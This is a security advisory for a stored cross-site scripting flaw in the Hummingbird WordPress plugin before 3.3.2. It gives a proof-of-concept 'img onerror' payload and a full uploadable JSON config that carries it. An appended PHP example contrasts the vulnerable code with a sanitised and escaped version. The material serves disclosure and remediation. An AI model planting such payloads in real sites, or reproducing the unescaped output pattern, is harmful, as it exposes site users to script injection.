Source: wpexploit, author Taurus Omar, WPEX-ID: E9DD62FC-BB79-4A6B-B99C-60E40F010D7A
Published: Mar 23, 2022 - 12:00 a.m.

Hummingbird < 3.3.2 - Admin+ Stored Cross-Site Scripting

Tags: hummingbird, admin+, stored, cross-site scripting, settings, configs, upload, payload, config, xss, security document, exploit, varnish cache

EPSS: 0.001 (percentile 24.8%)

The plugin does not sanitise and escape the Config Name, which could allow high-privilege users, such as admin, to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

Go to Hummingbird's Settings > Configs, edit the "Name and Description" and put the following payload in the Name field: <img src onerror=alert(/XSS/)>

Save and click 'Apply' to trigger the XSS.

Alternatively, go to Hummingbird's Settings > Configs and upload the following config:
{
  "id": 1,
  "name": "<img src onerror=alert(/XSS/)>",
  "description": "Xss",
  "config": {
    "configs": {
      "settings": {
        "advanced": {
          "query_string": false,
          "emoji": false,
          "cart_fragments": false,
          "lazy_load": {
            "enabled": false
          }
        },
        "database": {
          "reports": {
            "enabled": false
          }
        },
        "gravatar": {
          "enabled": true
        },
        "page_cache": {
          "enabled": true,
          "detection": "auto",
          "integrations": {
            "varnish": false,
            "opcache": false
          },
          "preload": false
        },
        "performance": [],
        "rss": {
          "enabled": true,
          "duration": 3600
        },
        "settings": {
          "accessible_colors": false,
          "remove_settings": false,
          "remove_data": false,
          "control": true
        },
        "uptime": {
          "enabled": false
        }
      }
    },
    "strings": {
      "advanced": [
        "Remove query strings from assets - Inactive\nRemove Emoji JS & CSS files - Inactive\nDisable WooCommerce cart fragments - Inactive\nComments lazy loading - Inactive\n"
      ],
      "database": [
        ""
      ],
      "gravatar": [
        "Gravatar cache - Active\n"
      ],
      "page_cache": [
        "Page cache - Active\nFile change detection - Auto\nPurge Varnish cache - Inactive\nPurge OpCache - Inactive\nCache preloading - Inactive\n"
      ],
      "rss": [
        "RSS caching - Active\n"
      ],
      "settings": [
        "High contrast mode - Inactive\nRemove settings on uninstall - Inactive\nRemove data on uninstall - Inactive\nCache control in admin bar - Active\n"
      ],
      "uptime": [
        "Uptime - Inactive\n"
      ]
    }
  },
  "plugin": "1081721"
}
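The defect the advisory describes is a missing sanitise-on-save and escape-on-output step for the config name. The snippet below is an added illustration of that pattern, not the Hummingbird plugin's code and not part of the original advisory: the hb_example_* functions are hypothetical, sanitize_text_field() and esc_html() are WordPress core helpers, and the fallbacks at the top exist only so the file also runs under the plain PHP CLI.

```php
<?php
// Added example, not the Hummingbird plugin's code. The hb_example_* names are
// hypothetical; sanitize_text_field() and esc_html() are WordPress core helpers.
// The fallbacks below only exist so the file also runs under the plain PHP CLI.
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field($str) {
        return trim(strip_tags((string) $str));
    }
}
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}

// Vulnerable pattern: the uploaded config's name is stored verbatim and later
// concatenated into the admin page, so any markup in it is rendered.
function hb_example_store_unsafe(array $config): array {
    return ['name' => $config['name'] ?? '', 'description' => $config['description'] ?? ''];
}
function hb_example_render_unsafe(array $stored): string {
    return '<td>' . $stored['name'] . '</td>';
}

// Hardened pattern: sanitise on save and escape on output. Neither step is
// conditional on a capability check, so an admin without unfiltered_html (or
// with it) cannot get markup into the page through this field.
function hb_example_store(array $config): array {
    return [
        'name'        => sanitize_text_field($config['name'] ?? ''),
        'description' => sanitize_text_field($config['description'] ?? ''),
    ];
}
function hb_example_render(array $stored): string {
    return '<td>' . esc_html($stored['name']) . '</td>';
}

// Constructed input shaped like the advisory's uploaded config (only the
// fields this example touches).
$uploaded = ['id' => 1, 'name' => '<img src onerror=alert(/XSS/)>', 'description' => 'Xss'];

echo hb_example_render_unsafe(hb_example_store_unsafe($uploaded)), PHP_EOL;
echo hb_example_render(hb_example_store($uploaded)), PHP_EOL;
// Output escaping alone also neutralises a value that slipped past sanitisation:
echo hb_example_render(hb_example_store_unsafe($uploaded)), PHP_EOL;
```

Both halves matter: sanitising on save keeps markup out of the stored config, and escaping on output protects the page even if a stored value was written by an older version or by another code path.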

